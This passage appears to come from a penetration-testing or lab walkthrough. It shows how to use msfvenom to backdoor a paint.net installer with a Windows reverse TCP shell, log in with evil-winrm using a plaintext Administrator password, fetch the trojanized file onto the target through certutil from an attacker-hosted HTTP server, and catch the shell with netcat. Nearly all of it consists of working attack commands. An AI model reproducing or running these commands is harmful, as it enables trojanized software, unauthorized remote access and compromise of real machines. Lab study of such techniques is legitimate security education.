2. Using executable files modified by msfvenom
Let’s continue placing payload on target machine. We can modify any mini-tools for Windows such as PuTTy, Winrar, Photo Editors, StickyNotes; which can be downloaded from internet. I will go one of external Paint software.
Here is the download link: https://www.getpaint.net/download.html
It’s downloaded to the attacker’s machine and modified with msfvenom (payload generator) on Kali.
msfvenom -a x64 --platform windows -x paint.net.5.0.3.exe -k -p windows/x64/shell_reverse_tcp lhost=attacker_IP lport=listener_nc -b "\x00" -f exe -o paint.exe
-a for integer capability
-- platform for OS
-x for file to be modified
-k for executing the payload on the background silently
-p for payload
-f for file the type for payload
-o for rename the payload
Now, we can access the target with previously gained credentials to transfer the payload
evil-winrm -i target_IP -u Administrator -p Password321
We can pull the payload to the target machine using certutil, over http-server of attacker.
certutil.exe -urlcache -f http://10.8.55.241:7777/paint.exe paint.exe
Start listener with nc on attacker machine: nc -lvp 4444
then, execute the transferred payload on gained shell: ./paint.exe
Comments